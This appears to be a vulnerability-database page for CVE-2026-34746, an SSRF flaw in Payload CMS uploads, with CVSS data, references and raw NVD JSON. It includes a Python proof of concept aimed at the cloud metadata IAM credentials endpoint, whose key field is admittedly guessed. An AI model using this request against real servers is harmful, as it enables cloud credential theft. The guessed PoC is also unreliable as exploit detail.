Security Vulnerability Report
CVE-2026-34746 CVSS 7.7 HIGH

Published: 2026-04-01 20:16:27
Last Modified: 2026-04-13 18:52:39

Description

Payload is a free and open source headless content management system. Prior to version 3.79.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the upload functionality. Authenticated users with create or update access to an upload-enabled collection could cause the server to make outbound HTTP requests to arbitrary URLs. This issue has been patched in version 3.79.1.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:* - VULNERABLE
Payload CMS < 3.79.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Target URL of the Payload CMS instance
target_url = "http://target-cms.com/api/uploads"

# Malicious URL (e.g., internal metadata service)
ssrf_payload = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Authentication token (Required as per PR:L)
headers = {
    "Authorization": "Bearer <VALID_JWT_TOKEN>",
    "Content-Type": "application/json"
}

# Payload data structure triggering the SSRF
# The specific field 'url' depends on the actual API implementation for uploads
data = {
    "file": "exploit.jpg",
    "url": ssrf_payload
}

# Send the malicious request
response = requests.post(target_url, json=data, headers=headers)

if response.status_code == 200:
    print("[+] SSRF request sent successfully.")
else:
    print("[-] Failed to send request.")

References

https://github.com/payloadcms/payload/releases/tag/v3.79.1 (Product, Release Notes)
https://github.com/payloadcms/payload/security/advisories/GHSA-6r7f-q7f5-wpx8 (Vendor Advisory, Mitigation)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34746", "sourceIdentifier": "[email protected]", "published": "2026-04-01T20:16:26.727", "lastModified": "2026-04-13T18:52:39.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Payload is a free and open source headless content management system. Prior to version 3.79.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the upload functionality. Authenticated users with create or update access to an upload-enabled collection could cause the server to make outbound HTTP requests to arbitrary URLs. This issue has been patched in version 3.79.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.79.1", "matchCriteriaId": "B4AE65F8-450D-4573-9CD7-1AA42CE5DC28"}]}]}], "references": [{"url": "https://github.com/payloadcms/payload/releases/tag/v3.79.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/payloadcms/payload/security/advisories/GHSA-6r7f-q7f5-wpx8", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}